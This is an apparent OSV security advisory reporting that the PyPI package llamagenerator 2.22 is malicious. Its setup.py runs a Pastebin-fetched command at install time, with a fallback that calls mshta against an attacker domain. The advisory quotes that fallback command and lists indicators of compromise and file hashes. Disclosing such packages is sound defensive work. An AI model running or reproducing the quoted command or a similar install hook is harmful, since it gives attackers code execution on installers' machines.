{
  "id": "MAL-2026-5771",
  "summary": "Malicious code in llamagenerator (PyPI)",
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (2e72d70dd6ee72468c56f2a334414bd1fa8f5ad1e70fea0d89c08f7d1c8ca557)\nThe package's setup.py fetches the raw contents of https://pastebin.com/raw/yBcUM1QB during pip install, takes the first line, and passes it directly to os.system('cmd /c \"...\"'). If the Pastebin fetch fails, it falls back to os.system('cmd /c \"mshta http://fixars.top\"'), invoking the Windows mshta living-off-the-land binary to download and execute an HTA script from an attacker-controlled domain over plaintext HTTP. Both branches grant the publisher arbitrary code execution on the installer's machine on `pip install`. The package has no legitimate functionality: PKG-INFO has placeholder metadata (Name/Author/Summary all set to 'LLamaGenerator', no description, no URL), and the src/ tree is empty aside from egg-info. The LLM-themed name appears to be a lure trading on the Llama ecosystem.\n\n## Source: kam193 (f3bd291e16e0208c59f8b5c9cb8844b6b4557bdfe204eb3e7253bad507f5685d)\nDuring installation, the code attempts to download and start a malicious executable.\n\nLikely related to 2025-08-raknet-testing-package.\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-easyaillm\n\n\nReasons (based on the campaign):\n\n\n - Downloads and executes a remote executable.\n\n\n - obfuscation\n\n\n - malware\n",
  "modified": "2026-06-15T20:31:53.272554781Z",
  "published": "2026-06-14T12:50:38Z",
  "database_specific": {
    "iocs": {
      "domains": ["fixars.top"],
      "urls": [
        "https://pastebin.com/raw/hEF5HaFc",
        "https://pastebin.com/raw/yBcUM1QBs",
        "https://pastebin.com/raw/yBcUM1QB",
        "http://fixars.top"
      ]
    },
    "malicious-packages-origins": [
      {
        "id": "pypi/2026-06-easyaillm/llamagenerator",
        "modified_time": "2026-06-14T12:50:38.980941Z",
        "import_time": "2026-06-14T13:36:53.095817636Z",
        "sha256": "f3bd291e16e0208c59f8b5c9cb8844b6b4557bdfe204eb3e7253bad507f5685d",
        "source": "kam193",
        "versions": ["2.22"]
      },
      {
        "source": "amazon-inspector",
        "modified_time": "2026-06-15T19:56:20Z",
        "import_time": "2026-06-15T20:14:28.691332297Z",
        "sha256": "2e72d70dd6ee72468c56f2a334414bd1fa8f5ad1e70fea0d89c08f7d1c8ca557",
        "id": "IN-MAL-2026-006695",
        "versions": ["2.22"]
      }
    ]
  },
  "references": [
    {"type": "EVIDENCE", "url": "https://www.virustotal.com/gui/file/1a5beab4a6facb46b4afc5f8526e1327e6c7d740ccaf34c6a921ac18eff29427/detection"},
    {"type": "EVIDENCE", "url": "https://www.virustotal.com/gui/file/4c99c8edfc4444f46932f14afccb2952a3850df765765f9ac793d69f318c192f/detection"},
    {"type": "EVIDENCE", "url": "https://www.virustotal.com/gui/file/0649f50ead3695f41c1243883200bdb775410bcd8c8fb88277740a625a154e25"},
    {"type": "WEB", "url": "https://bad-packages.kam193.eu/pypi/package/llamagenerator"},
    {"type": "PACKAGE", "url": "https://pypi.org/project/LLamaGenerator/2.22/"}
  ],
  "affected": [
    {
      "package": {
        "name": "llamagenerator",
        "ecosystem": "PyPI",
        "purl": "pkg:pypi/llamagenerator"
      },
      "versions": ["2.22"],
      "database_specific": {
        "indicators": {
          "package_integrity": [
            {
              "filename": "llamagenerator-2.22.tar.gz",
              "hashes": {
                "blake2b_256": "479263e9542ae078d1a9cbad8cc39eb7202e12dc66d2c642af81b9c0188a0d73",
                "md5": "d4fe7617995bcedd024b56d05b6e049e",
                "sha256": "9dde9422ef1d6b09dc4213be72484089b6c56f3b421d60747dcf69a63c6f307a"
              }
            }
          ],
          "evidence_files": [
            {
              "path": "setup.py",
              "sha256": "a17064062a8b565138985cac84982eb68e33a2d22f0ae4e5320d19fcb15dde69",
              "tlsh": "ba116513dd877ca762f140441d316860f96296ab2761c8dbb87c835d7fb06a18972cac"
            },
            {
              "path": "PKG-INFO",
              "sha256": "f3e5275520fba3a919b630da4caf4cf72c56be72c12421967726a9af6f7e73a6",
              "tlsh": "13e0d81423cadcf276a70a48590463339225829088c91419f4ea0bc6b29559953fd838"
            }
          ]
        },
        "cwes": [
          {
            "description": "The product contains code that appears to be malicious in nature.",
            "cweId": "CWE-506",
            "name": "Embedded Malicious Code"
          }
        ],
        "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/llamagenerator/MAL-2026-5771.json"
      }
    }
  ],
  "schema_version": "1.7.5",
  "credits": [
    {
      "name": "Amazon Inspector",
      "contact": ["inspector-research@amazon.com"],
      "type": "FINDER"
    },
    {
      "name": "Kamil Mańkowski (kam193)",
      "contact": ["https://github.com/kam193", "https://bad-packages.kam193.eu/"],
      "type": "REPORTER"
    }
  ]
}